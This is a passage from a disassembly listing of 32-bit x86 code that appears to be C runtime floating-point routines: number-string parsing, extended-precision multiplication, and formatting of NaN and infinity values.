sub eax, 3
jnz loc_41264B
loc_4124C0: ; CODE XREF: sub_4123ED+118�j
; sub_4123ED+167�j
mov ecx, esi
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124C4: ; CODE XREF: sub_4123ED+C8�j
push 2
pop ecx
mov [ebp+var_74], 8000h
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D0: ; CODE XREF: sub_4123ED+C4�j
and [ebp+var_74], 0
push 2
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D9: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
mov cl, al ; jumptable 0041247E case 1
sub cl, 31h
cmp cl, 8
mov [ebp+var_58], esi
jbe short loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124FB
loc_4124F7: ; CODE XREF: sub_4123ED+1A7�j
push 4
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_4124FB: ; CODE XREF: sub_4123ED+108�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
cmp al, bl
jz short loc_4124C0
loc_412507: ; CODE XREF: sub_4123ED+1B5�j
cmp al, 43h
jle loc_41264B
cmp al, 45h
jle short loc_412523
cmp al, 63h
jle loc_41264B
cmp al, 65h
jg loc_41264B
loc_412523: ; CODE XREF: sub_4123ED+124�j
push 6
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_412527: ; CODE XREF: sub_4123ED+110�j
; sub_4123ED+114�j ...
dec edx
push 0Bh
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_41252F: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
mov cl, al ; jumptable 0041247E case 2
sub cl, 31h
cmp cl, 8
jbe loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124A6
cmp al, bl
jz loc_4124C0
loc_41255A: ; CODE XREF: sub_4123ED+1F9�j
; sub_4123ED:loc_412619�j
mov edx, [ebp+var_54]
jmp loc_412676
; ---------------------------------------------------------------------------
loc_412562: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
mov [ebp+var_58], esi ; jumptable 0041247E case 3
jmp short loc_412581
; ---------------------------------------------------------------------------
loc_412567: ; CODE XREF: sub_4123ED+196�j
cmp al, 39h
jg short loc_412585
cmp [ebp+var_4C], 19h
jnb short loc_41257B
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
jmp short loc_41257E
; ---------------------------------------------------------------------------
loc_41257B: ; CODE XREF: sub_4123ED+182�j
inc [ebp+var_50]
loc_41257E: ; CODE XREF: sub_4123ED+18C�j
mov al, [edx]
inc edx
loc_412581: ; CODE XREF: sub_4123ED+178�j
cmp al, bl
jge short loc_412567
loc_412585: ; CODE XREF: sub_4123ED+17C�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124F7
loc_41259A: ; CODE XREF: sub_4123ED+1D6�j
; sub_4123ED+1F0�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
jmp loc_412507
; ---------------------------------------------------------------------------
loc_4125A7: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
cmp [ebp+var_4C], 0 ; jumptable 0041247E case 4
mov [ebp+var_58], esi
mov [ebp+var_5C], esi
jnz short loc_4125D9
jmp short loc_4125BB
; ---------------------------------------------------------------------------
loc_4125B5: ; CODE XREF: sub_4123ED+1D0�j
dec [ebp+var_50]
mov al, [edx]
inc edx
loc_4125BB: ; CODE XREF: sub_4123ED+1C6�j
cmp al, bl
jz short loc_4125B5
jmp short loc_4125D9
; ---------------------------------------------------------------------------
loc_4125C1: ; CODE XREF: sub_4123ED+1EE�j
cmp al, 39h
jg short loc_41259A
cmp [ebp+var_4C], 19h
jnb short loc_4125D6
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
dec [ebp+var_50]
loc_4125D6: ; CODE XREF: sub_4123ED+1DC�j
mov al, [edx]
inc edx
loc_4125D9: ; CODE XREF: sub_4123ED+1C4�j
; sub_4123ED+1D2�j
cmp al, bl
jge short loc_4125C1
jmp short loc_41259A
; ---------------------------------------------------------------------------
loc_4125DF: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
sub al, bl ; jumptable 0041247E case 5
cmp al, 9
mov [ebp+var_5C], esi
ja loc_41255A
push 4
jmp loc_412491
; ---------------------------------------------------------------------------
loc_4125F3: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
lea ecx, [edx-2] ; jumptable 0041247E case 6
mov [ebp+var_54], ecx
mov cl, al
sub cl, 31h
cmp cl, 8
ja short loc_41260A
loc_412603: ; CODE XREF: sub_4123ED+25C�j
; sub_4123ED+269�j
push 9
jmp loc_412491
; ---------------------------------------------------------------------------
loc_41260A: ; CODE XREF: sub_4123ED+214�j
movsx eax, al
sub eax, 2Bh
jz short loc_412632
dec eax
dec eax
jz short loc_412626
sub eax, 3
loc_412619: ; CODE XREF: sub_4123ED+26D�j
jnz loc_41255A
push 8
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412626: ; CODE XREF: sub_4123ED+227�j
; sub_4123ED+285�j
or [ebp+var_68], 0FFFFFFFFh
push 7
pop ecx
jmp loc_412472
; ---------------------------------------------------------------------------
loc_412632: ; CODE XREF: sub_4123ED+223�j
; sub_4123ED+281�j
push 7
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412639: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 8
jmp short loc_412641
; ---------------------------------------------------------------------------
loc_41263E: ; CODE XREF: sub_4123ED+256�j
mov al, [edx]
inc edx
loc_412641: ; CODE XREF: sub_4123ED+24F�j
cmp al, bl
jz short loc_41263E
sub al, 31h
cmp al, 8
jbe short loc_412603
loc_41264B: ; CODE XREF: sub_4123ED+CD�j
; sub_4123ED+11C�j ...
dec edx
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_41264E: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
mov cl, al ; jumptable 0041247E case 7
sub cl, 31h
cmp cl, 8
jbe short loc_412603
cmp al, bl
jmp short loc_412619
; ---------------------------------------------------------------------------
loc_41265C: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
cmp [ebp+arg_18], 0 ; jumptable 0041247E case 11
jz short loc_4126A9
movsx eax, al
sub eax, 2Bh
lea ecx, [edx-1]
mov [ebp+var_54], ecx
jz short loc_412632
dec eax
dec eax
jz short loc_412626
mov edx, ecx
loc_412676: ; CODE XREF: sub_4123ED+170�j
; sub_4123ED+25F�j ...
cmp [ebp+var_58], 0
mov eax, [ebp+var_70]
mov [eax], edx
jz loc_412A2A
push 18h
pop eax
cmp [ebp+var_4C], eax
jbe short loc_41269D
cmp [ebp+var_9], 5
jl short loc_412696
inc [ebp+var_9]
loc_412696: ; CODE XREF: sub_4123ED+2A4�j
dec edi
inc [ebp+var_50]
mov [ebp+var_4C], eax
loc_41269D: ; CODE XREF: sub_4123ED+29E�j
cmp [ebp+var_4C], 0
jbe loc_412A51
jmp short loc_412702
; ---------------------------------------------------------------------------
loc_4126A9: ; CODE XREF: sub_4123ED+273�j
push 0Ah
pop ecx
dec edx
loc_4126AD: ; CODE XREF: sub_4123ED+8B�j
; sub_4123ED+91�j
; DATA XREF: ...
cmp ecx, 0Ah ; default
; jumptable 0041247E case 10
jnz loc_412472
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: seg000:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 9
xor ecx, ecx
jmp short loc_4126D8
; ---------------------------------------------------------------------------
loc_4126BF: ; CODE XREF: sub_4123ED+2ED�j
cmp al, 39h
jg short loc_4126E3
imul ecx, 0Ah
movsx esi, al
lea ecx, [ecx+esi-30h]
cmp ecx, 1450h
jg short loc_4126DE
mov al, [edx]
inc edx
loc_4126D8: ; CODE XREF: sub_4123ED+2D0�j
cmp al, bl
jge short loc_4126BF
jmp short loc_4126E3
; ---------------------------------------------------------------------------
loc_4126DE: ; CODE XREF: sub_4123ED+2E6�j
mov ecx, 1451h
loc_4126E3: ; CODE XREF: sub_4123ED+2D4�j
; sub_4123ED+2EF�j
mov [ebp+var_64], ecx
jmp short loc_4126F3
; ---------------------------------------------------------------------------
loc_4126E8: ; CODE XREF: sub_4123ED+308�j
cmp al, 39h
jg loc_41264B
mov al, [edx]
inc edx
loc_4126F3: ; CODE XREF: sub_4123ED+2F9�j
cmp al, bl
jge short loc_4126E8
jmp loc_41264B
; ---------------------------------------------------------------------------
loc_4126FC: ; CODE XREF: sub_4123ED+319�j
dec [ebp+var_4C]
inc [ebp+var_50]
loc_412702: ; CODE XREF: sub_4123ED+2BA�j
dec edi
cmp byte ptr [edi], 0
jz short loc_4126FC
lea eax, [ebp+var_3C]
push eax
push [ebp+var_4C]
lea eax, [ebp+var_20]
push eax
call sub_4137AA
mov eax, [ebp+var_64]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_68], ecx
jge short loc_412727
neg eax
loc_412727: ; CODE XREF: sub_4123ED+336�j
add eax, [ebp+var_50]
cmp [ebp+var_60], ecx
jnz short loc_412732
add eax, [ebp+arg_10]
loc_412732: ; CODE XREF: sub_4123ED+340�j
cmp [ebp+var_5C], ecx
jnz short loc_41273A
sub eax, [ebp+arg_14]
loc_41273A: ; CODE XREF: sub_4123ED+348�j
cmp eax, 1450h
jg loc_412A33
cmp eax, 0FFFFEBB0h
jl loc_412A4A
mov esi, offset dword_424260
sub esi, 60h
cmp eax, ecx
mov [ebp+var_54], eax
jz loc_412A18
jge short loc_412772
neg eax
mov esi, offset dword_4243C0
mov [ebp+var_54], eax
sub esi, 60h
loc_412772: ; CODE XREF: sub_4123ED+376�j
cmp [ebp+arg_C], ecx
jnz short loc_41277B
mov word ptr [ebp+var_3C], cx
loc_41277B: ; CODE XREF: sub_4123ED+388�j
cmp [ebp+var_54], ecx
jz loc_412A18
loc_412784: ; CODE XREF: sub_4123ED+625�j
mov eax, [ebp+var_54]
sar [ebp+var_54], 3
add esi, 54h
and eax, 7
test eax, eax
mov [ebp+var_4C], esi
jz loc_412A0E
imul eax, 0Ch
add eax, esi
mov ebx, eax
cmp word ptr [ebx], 8000h
mov [ebp+var_70], ebx
jb short loc_4127C1
mov esi, ebx
lea edi, [ebp+var_48]
movsd
movsd
movsd
dec [ebp+var_46]
mov esi, [ebp+var_4C]
lea ebx, [ebp+var_48]
mov [ebp+var_70], ebx
loc_4127C1: ; CODE XREF: sub_4123ED+3BE�j
movzx edx, word ptr [ebx+0Ah]
mov ecx, [ebp+var_32]
xor eax, eax
mov [ebp+var_50], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov eax, edx
mov edi, 7FFFh
xor eax, ecx
and ecx, edi
and edx, edi
and eax, 8000h
cmp cx, 7FFFh
lea edi, [edx+ecx]
movzx edi, di
jnb loc_4129F4
cmp dx, 7FFFh
jnb loc_4129F4
cmp di, 0BFFDh
ja loc_4129F4
cmp di, 3FBFh
ja short loc_412823
xor eax, eax
mov [ebp+var_38], eax
mov [ebp+var_3C], eax
jmp loc_412A0B
; ---------------------------------------------------------------------------
loc_412823: ; CODE XREF: sub_4123ED+427�j
test cx, cx
jnz short loc_412847
inc edi
test dword ptr [ebp-34h], 7FFFFFFFh
jnz short loc_412847
cmp [ebp+var_38], 0
jnz short loc_412847
cmp [ebp+var_3C], 0
jnz short loc_412847
and word ptr [ebp+var_32], cx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_412847: ; CODE XREF: sub_4123ED+439�j
; sub_4123ED+443�j ...
xor ecx, ecx
cmp dx, cx
jnz short loc_41286F
inc edi
test dword ptr [ebx+8], 7FFFFFFFh
jnz short loc_41286F
cmp [ebx+4], ecx
jnz short loc_41286F
cmp [ebx], ecx
jnz short loc_41286F
mov [ebp-34h], ecx
mov [ebp+var_38], ecx
mov [ebp+var_3C], ecx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_41286F: ; CODE XREF: sub_4123ED+45F�j
; sub_4123ED+469�j ...
and [ebp+var_68], ecx
lea esi, [ebp+var_28]
mov [ebp+var_58], 5
loc_41287C: ; CODE XREF: sub_4123ED+4FF�j
mov ecx, [ebp+var_68]
mov edx, [ebp+var_58]
add ecx, ecx
test edx, edx
mov [ebp+var_64], edx
jle short loc_4128E0
lea ecx, [ebp+ecx+var_3C]
add ebx, 8
mov [ebp+var_5C], ecx
mov [ebp+var_60], ebx
loc_412898: ; CODE XREF: sub_4123ED+4EE�j
mov ecx, [ebp+var_60]
mov edx, [ebp+var_5C]
movzx edx, word ptr [edx]
movzx ecx, word ptr [ecx]
and [ebp+var_78], 0
imul ecx, edx
mov edx, [esi-4]
lea ebx, [edx+ecx]
cmp ebx, edx
jb short loc_4128B9
cmp ebx, ecx
jnb short loc_4128C0
loc_4128B9: ; CODE XREF: sub_4123ED+4C6�j
mov [ebp+var_78], 1
loc_4128C0: ; CODE XREF: sub_4123ED+4CA�j
cmp [ebp+var_78], 0
mov [esi-4], ebx
jz short loc_4128CC
inc word ptr [esi]
loc_4128CC: ; CODE XREF: sub_4123ED+4DA�j
add [ebp+var_5C], 2
sub [ebp+var_60], 2
dec [ebp+var_64]
cmp [ebp+var_64], 0
jg short loc_412898
mov ebx, [ebp+var_70]
loc_4128E0: ; CODE XREF: sub_4123ED+49C�j
inc esi
inc esi
inc [ebp+var_68]
dec [ebp+var_58]
cmp [ebp+var_58], 0
jg short loc_41287C
add edi, 0C002h
test di, di
jle short loc_412934
loc_4128F9: ; CODE XREF: sub_4123ED+540�j
test [ebp+var_24], 80000000h
jnz short loc_41292F
mov esi, [ebp+var_28]
mov ecx, [ebp+var_2C]
shl [ebp+var_2C], 1
shr ecx, 1Fh
mov edx, esi
add esi, esi
or esi, ecx
mov ecx, [ebp+var_24]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
add edi, 0FFFFh
test di, di
mov [ebp+var_28], esi
mov [ebp+var_24], ecx
jg short loc_4128F9
loc_41292F: ; CODE XREF: sub_4123ED+513�j
test di, di
jg short loc_412982
loc_412934: ; CODE XREF: sub_4123ED+50A�j
add edi, 0FFFFh
test di, di
jge short loc_412982
mov ecx, edi
neg ecx
movzx esi, cx
add edi, esi
loc_412948: ; CODE XREF: sub_4123ED+588�j
test byte ptr [ebp+var_2C], 1
jz short loc_412951
inc [ebp+var_50]
loc_412951: ; CODE XREF: sub_4123ED+55F�j
mov ecx, [ebp+var_24]
mov ebx, [ebp+var_28]
mov edx, [ebp+var_28]
shr [ebp+var_24], 1
shl ecx, 1Fh
shr ebx, 1
or ebx, ecx
mov ecx, [ebp+var_2C]
shl edx, 1Fh
shr ecx, 1
or ecx, edx
dec esi
mov [ebp+var_28], ebx
mov [ebp+var_2C], ecx
jnz short loc_412948
cmp [ebp+var_50], 0
jz short loc_412982
or word ptr [ebp+var_2C], 1
loc_412982: ; CODE XREF: sub_4123ED+545�j
; sub_4123ED+550�j ...
cmp word ptr [ebp+var_2C], 8000h
ja short loc_41299B
mov ecx, [ebp+var_2C]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_4129CE
loc_41299B: ; CODE XREF: sub_4123ED+59B�j
cmp [ebp+var_2C+2], 0FFFFFFFFh
jnz short loc_4129CB
and [ebp+var_2C+2], 0
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_4129C6
and [ebp+var_28+2], 0
cmp word ptr [ebp+var_24+2], 0FFFFh
jnz short loc_4129C0
mov word ptr [ebp+var_24+2], 8000h
inc edi
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C0: ; CODE XREF: sub_4123ED+5C8�j
inc word ptr [ebp+var_24+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C6: ; CODE XREF: sub_4123ED+5BC�j
inc [ebp+var_28+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129CB: ; CODE XREF: sub_4123ED+5B2�j
inc [ebp+var_2C+2]
loc_4129CE: ; CODE XREF: sub_4123ED+5AC�j
; sub_4123ED+5D1�j ...
cmp di, 7FFFh
mov esi, [ebp+var_4C]
jnb short loc_4129F4
mov cx, word ptr [ebp+var_2C+2]
mov word ptr [ebp+var_3C], cx
mov ecx, [ebp+var_28]
mov [ebp+var_3C+2], ecx
mov ecx, [ebp+var_24]
or edi, eax
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_32], di
jmp short loc_412A0E
; ---------------------------------------------------------------------------
loc_4129F4: ; CODE XREF: sub_4123ED+406�j
; sub_4123ED+411�j ...
neg ax
sbb eax, eax
and [ebp+var_38], 0
and eax, 80000000h
add eax, 7FFF8000h
and [ebp+var_3C], 0
loc_412A0B: ; CODE XREF: sub_4123ED+431�j
mov [ebp-34h], eax
loc_412A0E: ; CODE XREF: sub_4123ED+3A9�j
; sub_4123ED+455�j ...
cmp [ebp+var_54], 0
jnz loc_412784
loc_412A18: ; CODE XREF: sub_4123ED+370�j
; sub_4123ED+391�j
mov eax, [ebp-34h]
movzx ecx, word ptr [ebp+var_3C]
mov esi, [ebp+var_3C+2]
mov edx, [ebp+var_38+2]
shr eax, 10h
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A2A: ; CODE XREF: sub_4123ED+292�j
mov [ebp+var_6C], 4
jmp short loc_412A51
; ---------------------------------------------------------------------------
loc_412A33: ; CODE XREF: sub_4123ED+352�j
xor esi, esi
mov eax, 7FFFh
mov edx, 80000000h
xor ecx, ecx
mov [ebp+var_6C], 2
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A4A: ; CODE XREF: sub_4123ED+35D�j
mov [ebp+var_6C], 1
loc_412A51: ; CODE XREF: sub_4123ED+2B4�j
; sub_4123ED+644�j
xor ecx, ecx
xor eax, eax
xor edx, edx
xor esi, esi
loc_412A59: ; CODE XREF: sub_4123ED+63B�j
; sub_4123ED+65B�j
mov edi, [ebp+var_7C]
or eax, [ebp+var_74]
mov [edi], cx
mov [edi+0Ah], ax
mov eax, [ebp+var_6C]
mov [edi+2], esi
mov [edi+6], edx
loc_412A6F: ; CODE XREF: sub_4123ED+63�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4123ED endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_412A81 dd offset loc_412485 ; DATA XREF: sub_4123ED+91�r
dd offset loc_4124D9 ; jump table for switch statement
dd offset loc_41252F
dd offset loc_412562
dd offset loc_4125A7
dd offset loc_4125DF
dd offset loc_4125F3
dd offset loc_41264E
dd offset loc_412639
dd offset loc_4126B8
dd offset loc_4126AD
dd offset loc_41265C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412AB1 proc near ; CODE XREF: sub_411771+3F�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1A = dword ptr -1Ah
var_16 = dword ptr -16h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
lea esi, [ebp+arg_0]
lea edi, [ebp+var_10]
movsd
movsd
movsw
mov edx, [ebp+var_8]
mov ecx, edx
mov eax, 8000h
and ecx, eax
and edx, 7FFFh
test cx, cx
mov [ebp+var_60], ebx
mov byte ptr [ebp+var_30], 0CCh
mov byte ptr [ebp+var_30+1], 0CCh
mov byte ptr [ebp+var_30+2], 0CCh
mov byte ptr [ebp+var_30+3], 0CCh
mov byte ptr [ebp+var_2C], 0CCh
mov byte ptr [ebp+var_2C+1], 0CCh
mov byte ptr [ebp+var_2C+2], 0CCh
mov byte ptr [ebp+var_2C+3], 0CCh
mov byte ptr [ebp+var_28], 0CCh
mov byte ptr [ebp+var_28+1], 0CCh
mov byte ptr [ebp+var_28+2], 0FBh
mov byte ptr [ebp+var_28+3], 3Fh
mov [ebp+var_74], 1
mov [ebp+var_6C], ecx
jz short loc_412B2B
mov byte ptr [ebx+2], 2Dh
jmp short loc_412B2F
; ---------------------------------------------------------------------------
loc_412B2B: ; CODE XREF: sub_412AB1+72�j
mov byte ptr [ebx+2], 20h
loc_412B2F: ; CODE XREF: sub_412AB1+78�j
test dx, dx
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jnz short loc_412B68
test esi, esi
jnz short loc_412B68
test edi, edi
jnz short loc_412B68
and [ebx], di
cmp cx, ax
setnz al
dec al
and al, 0Dh
add al, 20h
mov [ebx+2], al
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
mov byte ptr [ebx+5], 0
loc_412B60: ; CODE XREF: sub_412AB1+6FB�j
; sub_412AB1+8C3�j
xor eax, eax
inc eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412B68: ; CODE XREF: sub_412AB1+87�j
; sub_412AB1+8B�j ...
cmp dx, 7FFFh
jnz loc_412C11
mov eax, 80000000h
cmp esi, eax
mov word ptr [ebx], 1
jnz short loc_412B85
test edi, edi
jz short loc_412B94
loc_412B85: ; CODE XREF: sub_412AB1+CE�j
test esi, 40000000h
jnz short loc_412B94
push offset a1Snan ; "1#SNAN"
jmp short loc_412BE5
; ---------------------------------------------------------------------------
loc_412B94: ; CODE XREF: sub_412AB1+D2�j
; sub_412AB1+DA�j
test cx, cx
jz short loc_412BAC
cmp esi, 0C0000000h
jnz short loc_412BAC
test edi, edi
jnz short loc_412BE0
push offset a1Ind ; "1#IND"
jmp short loc_412BB9
; ---------------------------------------------------------------------------
loc_412BAC: ; CODE XREF: sub_412AB1+E6�j
; sub_412AB1+EE�j
cmp esi, eax
jnz short loc_412BE0
test edi, edi
jnz short loc_412BE0
push offset a1Inf ; "1#INF"
loc_412BB9: ; CODE XREF: sub_412AB1+F9�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412BDA
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412BDA: ; CODE XREF: sub_412AB1+11A�j
mov byte ptr [ebx+3], 5
jmp short loc_412C0A
; ---------------------------------------------------------------------------
loc_412BE0: ; CODE XREF: sub_412AB1+F2�j
; sub_412AB1+FD�j ...
push offset a1Qnan ; "1#QNAN"
loc_412BE5: ; CODE XREF: sub_412AB1+E1�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412C06: ; CODE XREF: sub_412AB1+146�j
mov byte ptr [ebx+3], 6
loc_412C0A: ; CODE XREF: sub_412AB1+12D�j
xor eax, eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412C11: ; CODE XREF: sub_412AB1+BC�j
movzx ecx, dx
mov ebx, ecx
imul ecx, 4D10h
shr ebx, 8
mov eax, esi
shr eax, 18h
lea eax, [ebx+eax*2]
imul eax, 4Dh
lea eax, [eax+ecx-134312F4h]
sar eax, 10h
movzx ecx, ax
movsx ebx, cx
mov [ebp+var_4C], ecx
xor eax, eax
mov ecx, offset dword_424260
neg ebx
sub ecx, 60h
cmp ebx, eax
mov word ptr [ebp+var_16], dx
mov [ebp+var_1A], esi
mov [ebp+var_20+2], edi
mov word ptr [ebp+var_20], ax
mov [ebp+var_68], ecx
jz loc_412F10
jge short loc_412C71
mov ecx, offset dword_4243C0
neg ebx
sub ecx, 60h
mov [ebp+var_68], ecx
loc_412C71: ; CODE XREF: sub_412AB1+1B1�j
cmp ebx, eax
jz loc_412F10
loc_412C79: ; CODE XREF: sub_412AB1+457�j
add [ebp+var_68], 54h
mov ecx, ebx
and ecx, 7
sar ebx, 3
test ecx, ecx
jz loc_412F06
imul ecx, 0Ch
add ecx, [ebp+var_68]
cmp word ptr [ecx], 8000h
mov [ebp+var_64], ecx
jb short loc_412CB0
mov esi, ecx
lea edi, [ebp+var_3C]
movsd
movsd
lea eax, [ebp+var_3C]
movsd
dec [ebp+var_3C+2]
mov [ebp+var_64], eax
mov ecx, eax
loc_412CB0: ; CODE XREF: sub_412AB1+1EA�j
movzx edi, word ptr [ecx+0Ah]
mov edx, [ebp+var_16]
xor eax, eax
mov ecx, edi
mov esi, 7FFFh
xor ecx, edx
and edx, esi
and edi, esi
mov [ebp+var_48], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
and ecx, 8000h
cmp dx, si
lea eax, [edi+edx]
movzx eax, ax
jnb loc_412EEA
cmp di, si
jnb loc_412EEA
cmp ax, 0BFFDh
ja loc_412EEA
cmp ax, 3FBFh
ja short loc_412D10
xor eax, eax
mov [ebp+var_1A+2], eax
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D10: ; CODE XREF: sub_412AB1+24D�j
xor esi, esi
cmp dx, si
jnz short loc_412D34
inc eax
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412D34
cmp [ebp-1Ch], esi
jnz short loc_412D34
cmp [ebp+var_20], esi
jnz short loc_412D34
mov word ptr [ebp+var_16], si
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D34: ; CODE XREF: sub_412AB1+264�j
; sub_412AB1+26E�j ...
cmp di, si
jnz short loc_412D5D
mov edx, [ebp+var_64]
inc eax
test dword ptr [edx+8], 7FFFFFFFh
jnz short loc_412D5D
cmp [edx+4], esi
jnz short loc_412D5D
cmp [edx], esi
jnz short loc_412D5D
mov [ebp+var_1A+2], esi
mov [ebp-1Ch], esi
mov [ebp+var_20], esi
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D5D: ; CODE XREF: sub_412AB1+286�j
; sub_412AB1+293�j ...
lea edi, [ebp+var_C]
mov [ebp+var_5C], esi
mov [ebp+var_44], edi
mov [ebp+var_40], 5
loc_412D6D: ; CODE XREF: sub_412AB1+332�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_412DD4
lea edx, [ebp+edx+var_20]
mov [ebp+var_58], edx
mov edx, [ebp+var_64]
add edx, 8
mov [ebp+var_54], edx
loc_412D8C: ; CODE XREF: sub_412AB1+321�j
mov edx, [ebp+var_58]
mov esi, [ebp+var_54]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
mov edi, [edi-4]
imul edx, esi
and [ebp+var_70], 0
lea esi, [edi+edx]
cmp esi, edi
jb short loc_412DAD
cmp esi, edx
jnb short loc_412DB4
loc_412DAD: ; CODE XREF: sub_412AB1+2F6�j
mov [ebp+var_70], 1
loc_412DB4: ; CODE XREF: sub_412AB1+2FA�j
cmp [ebp+var_70], 0
mov edi, [ebp+var_44]
mov [edi-4], esi
jz short loc_412DC3
inc word ptr [edi]
loc_412DC3: ; CODE XREF: sub_412AB1+30D�j
add [ebp+var_58], 2
sub [ebp+var_54], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412D8C
loc_412DD4: ; CODE XREF: sub_412AB1+2C9�j
inc edi
inc edi
inc [ebp+var_5C]
dec [ebp+var_40]
cmp [ebp+var_40], 0
mov [ebp+var_44], edi
jg short loc_412D6D
add eax, 0C002h
test ax, ax
jle short loc_412E2A
loc_412DEF: ; CODE XREF: sub_412AB1+372�j
test [ebp+var_8], 80000000h
jnz short loc_412E25
mov edx, [ebp+var_10]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add edi, edi
or edi, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add eax, 0FFFFh
test ax, ax
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jg short loc_412DEF
loc_412E25: ; CODE XREF: sub_412AB1+345�j
test ax, ax
jg short loc_412E7C
loc_412E2A: ; CODE XREF: sub_412AB1+33C�j
add eax, 0FFFFh
test ax, ax
jge short loc_412E7C
mov edx, eax
neg edx
movzx edx, dx
mov [ebp+var_44], edx
add eax, edx
loc_412E40: ; CODE XREF: sub_412AB1+3BE�j
test byte ptr [ebp+var_10], 1
jz short loc_412E49
inc [ebp+var_48]
loc_412E49: ; CODE XREF: sub_412AB1+393�j
mov edx, [ebp+var_8]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr edi, 1
or edi, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
